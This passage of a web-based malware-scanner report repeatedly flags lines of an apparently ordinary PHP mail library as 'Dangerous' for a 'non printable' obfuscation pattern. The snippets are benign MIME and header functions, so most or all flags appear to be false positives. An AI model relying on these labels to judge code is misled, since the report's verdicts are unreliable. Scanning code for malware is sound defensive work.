</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
